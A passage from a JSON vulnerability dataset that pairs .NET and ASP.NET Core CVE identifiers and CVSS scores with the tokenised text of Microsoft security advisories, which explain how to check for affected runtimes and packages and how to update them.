dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG APITAG and APITAG If your host version is a NUMBERTAG host, you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87395. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87396. "severity": "HIGH",
  87397. "baseScore": 7.5,
  87398. "impactScore": 3.6,
  87399. "exploitabilityScore": 3.9
  87400. },
  87401. {
  87402. "CVE_ID": "CVE-2017-8585",
  87403. "Issue_Url_old": "https://github.com/dotnet/corefx/issues/24703",
  87404. "Issue_Url_new": "https://github.com/dotnet/runtime/issues/23876",
  87405. "Repo_new": "dotnet/runtime",
  87406. "Issue_Created_At": "2017-10-17T21:18:37Z",
  87407. "description": "Announcement] APITAG Microsoft Security Advisory CVETAG : Malformed Culture can cause application crash. Microsoft Security Advisory CVETAG Malformed Culture can cause application to crash Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public version of .NET Core where a malformed string request could cause an application to crash and lead to a denial of service. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG Developers are advised to update their .NET Core SDK to version NUMBERTAG Mitigation Factors .NET Core NUMBERTAG is not affected by this issue. Advisory FAQ How do I know if I am affected? Any application running against .NET Core NUMBERTAG or lower versions, or NUMBERTAG or lower versions is affected. The latest version of the .NET core runtime you have installed in your computer can be listed by running APITAG . Running that command produces an output similar to the following: ERRORTAG As this command only displays the latest version of the runtime installed (or the version set in the FILETAG file), it may hide the fact that you have a vulnerable runtime. A complete list of runtimes can be discovered by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG PATHTAG | | APITAG | PATHTAG | | APITAG Linux platforms URLTAG | PATHTAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG and NUMBERTAG then any applications targeting NUMBERTAG or NUMBERTAG of .NET Core are vulnerable. Also, even if you have a directory for NUMBERTAG and NUMBERTAG present in your system, if you've deployed self contained applications URLTAG targeting the impacted versions, these applications are also vulnerable. How do I fix my affected application? Applications can be fixed by installing the latest .NET Core runtimes or SDKs. Typically, application servers only have runtime packages installed and developer machines have the SDKs installed. Installers for the runtimes can be downloaded from the FILETAG . .NET Core NUMBERTAG SDK installs both versions NUMBERTAG and NUMBERTAG of the .NET Core runtime. If you've built a self contained application URLTAG , you must install the new runtime and SDK, recompile your application and redeploy. What if the update breaks my application? An application can be pinned to a previous version of the runtime by editing the APITAG URLTAG file for that application. Set the framework version to the desired version and the APITAG property to false . These settings should be treated as a temporary measure and the application updated to work with the patched versions of the framework. Since the APITAG file is an optional file, you may need to create one for each application and add it alongside the executable.",
  87408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87409. "severity": "HIGH",
  87410. "baseScore": 7.5,
  87411. "impactScore": 3.6,
  87412. "exploitabilityScore": 3.9
  87413. },
  87414. {
  87415. "CVE_ID": "CVE-2019-1302",
  87416. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/384",
  87417. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/384",
  87418. "Repo_new": "aspnet/announcements",
  87419. "Issue_Created_At": "2019-09-10T17:00:20Z",
  87420. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of an elevation of privilege vulnerability exists when a ASP.NET Core web application, created using vulnerable project templates, fails to properly sanitize web requests. An attacker who successfully exploited this vulnerability could perform content injection attacks and run script in the security context of the logged on user. To exploit the vulnerability, an attacker could send a specially crafted email, containing a malicious link, to a user. Alternatively, an attacker could use a chat client to social engineer a user into clicking the malicious link. However, in all cases to exploit this vulnerability a user must click a maliciously crafted link from an attacker. The update addresses the vulnerability by correcting how the .NET Core web application handles content encoding and updates the application templates to depend on the corrected code libraries. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not ASP.NET SPA services your application is not vulnerable. APITAG APITAG Affected software Any .NET Core based application running on ASP.NET Core NUMBERTAG or ASP.NET Core NUMBERTAG or any preview of ASP.NET Core NUMBERTAG APITAG APITAG Affected software Any ASP.NET Core based application that uses APITAG with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG ASP.NET Core NUMBERTAG will be updated with its RTM release. APITAG APITAG How do I know if I am affected? .NET Core has two types of dependencies: direct and transitive. Direct dependencies are dependencies where you specifically add a package to your project, transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, the APITAG package depends on the APITAG package. When you add a dependency on APITAG in your project, you're taking a transitive dependency on APITAG . Any application that has a direct or transitive dependency on the affected package affected software can be exposed to the vulnerability if it does not meet any of the mitigation factors mitigation factors . APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. If you have .NET Core NUMBERTAG or greater installed, you can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG you need to install updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. If you have pinned your application URLTAG to a specific version of the runtime, you must update your app, recompile and redeploy it for the update to take effect. You must now update your existing SPA services projects to use the newer version of the vulnerable packages. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG respectively. The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Ian Routledge ( APITAG URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87421. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  87422. "severity": "HIGH",
  87423. "baseScore": 8.8,
  87424. "impactScore": 5.9,
  87425. "exploitabilityScore": 2.8
  87426. },
  87427. {
  87428. "CVE_ID": "CVE-2018-8416",
  87429. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/95",
  87430. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/95",
  87431. "Repo_new": "dotnet/announcements",
  87432. "Issue_Created_At": "2019-01-08T18:00:27Z",
  87433. "description": "Microsoft Security Advisory CVETAG : .NET Core Tampering Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Tampering Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a tampering vulnerability exists when .NET Core improperly handles specially crafted files. An attacker who successfully exploited this vulnerability could write arbitrary files and directories to certain locations on a vulnerable system. However, an attacker would have limited control over the destination of the files and directories. To exploit the vulnerability, an attacker must send a specially crafted file to a vulnerable system The update addresses the vulnerability by correcting how .NET Core handles these files. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors If your application does not extract ZIP compressed files it is unaffected. APITAG APITAG Affected software Any .NET Core based application that uses the APITAG URLTAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. APITAG APITAG How do I fix the issue? If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . Finally, you must restart your applications once an updated runtime or SDK is installed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Danny Grander URLTAG of FILETAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87434. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  87435. "severity": "MEDIUM",
  87436. "baseScore": 6.5,
  87437. "impactScore": 3.6,
  87438. "exploitabilityScore": 2.8
  87439. },
  87440. {
  87441. "CVE_ID": "CVE-2022-23267",
  87442. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/221",
  87443. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/221",
  87444. "Repo_new": "dotnet/announcements",
  87445. "Issue_Created_At": "2022-05-10T18:28:50Z",
  87446. "description": "Microsoft Security Advisory CVE NUMBERTAG NET Denial of Service Vulnerability. Microsoft Security Advisory CVE NUMBERTAG NET Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET NUMBERTAG NET NUMBERTAG and .NET core NUMBERTAG where a malicious client can cause a Denial of Service via excess memory allocations through APITAG Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG application running on .NET NUMBERTAG or earlier. Any .NET NUMBERTAG application running .NET NUMBERTAG or earlier. Any .NET Core NUMBERTAG applicaiton running on .NET Core NUMBERTAG or earlier. APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG or .NET NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or Visual Studio NUMBERTAG or Visual Studio NUMBERTAG or Visual Studio NUMBERTAG from FILETAG .NET NUMBERTAG NET NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET NUMBERTAG or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links [CVE NUMBERTAG URLTAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87447. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87448. "severity": "HIGH",
  87449. "baseScore": 7.5,
  87450. "impactScore": 3.6,
  87451. "exploitabilityScore": 3.9
  87452. },
  87453. {
  87454. "CVE_ID": "CVE-2021-24112",
  87455. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/176",
  87456. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/176",
  87457. "Repo_new": "dotnet/announcements",
  87458. "Issue_Created_At": "2021-02-09T18:17:29Z",
  87459. "description": "Microsoft Security Advisory CVETAG | .NET NUMBERTAG and .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG | .NET NUMBERTAG and .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A remote code execution vulnerability exists when parsing certain types of graphics files. This vulnerability only exists on systems running on APITAG or Linux. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87461. "severity": "CRITICAL",
  87462. "baseScore": 9.8,
  87463. "impactScore": 5.9,
  87464. "exploitabilityScore": 3.9
  87465. },
  87466. {
  87467. "CVE_ID": "CVE-2018-8292",
  87468. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/88",
  87469. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/88",
  87470. "Repo_new": "dotnet/announcements",
  87471. "Issue_Created_At": "2018-10-09T22:51:18Z",
  87472. "description": "Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security feature bypass vulnerability that exists when .NET Core when HTTP authentication information is inadvertently exposed in an outbound request that encounters an HTTP redirect. An attacker who successfully exploited this vulnerability could use the information to further compromise the web application. The update addresses the vulnerability by correcting how .NET Core applications handles HTTP redirects. System administrators running .NET Core NUMBERTAG or .NET Core NUMBERTAG applications must update their .NET Core runtimes to versions NUMBERTAG and NUMBERTAG then restart their applications. If installed applications target .NET Core NUMBERTAG the applications must be migrated to NUMBERTAG or newer and redeployed. Developers must update their .NET Core SDK to versions NUMBERTAG and migrate any FILETAG or FILETAG applications to NUMBERTAG then redeploy. Discussion Discussion for this issue can be found at APITAG TBD APITAG APITAG Mitigation factors None APITAG APITAG Affected software Any .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime. Additionally package authors should check their dependencies to ensure they aren't depending on a vulnerable version of the following package: APITAG APITAG Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG NUMBERTAG or later APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Any .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime with a version number of NUMBERTAG or lower, or a .NET Core application that runs on a .NET Core NUMBERTAG runtime. To check the currently installed runtimes and SDKs with version NUMBERTAG or later of .NET Core, open a command prompt and run the APITAG command. You should see an output similar to the following: ERRORTAG If you don't see a runtime entry for NUMBERTAG or NUMBERTAG any .NET Core NUMBERTAG applications run on that computer are vulnerable. If you don't have a NUMBERTAG ersion of the runtime or SDK installed, you can produce the complete list of runtimes by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG | | APITAG | APITAG | | Supported Linux platforms | APITAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG then any application targeting versions NUMBERTAG or NUMBERTAG are vulnerable. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. APITAG How do I fix the vulnerability? System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG and install the latest NUMBERTAG runtime, ensuring that any NUMBERTAG applications are migrated to NUMBERTAG as soon as possible. Developers are advised to update their .NET Core SDK to versions NUMBERTAG and migrate any .NET Core URLTAG or FILETAG applications to NUMBERTAG and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET 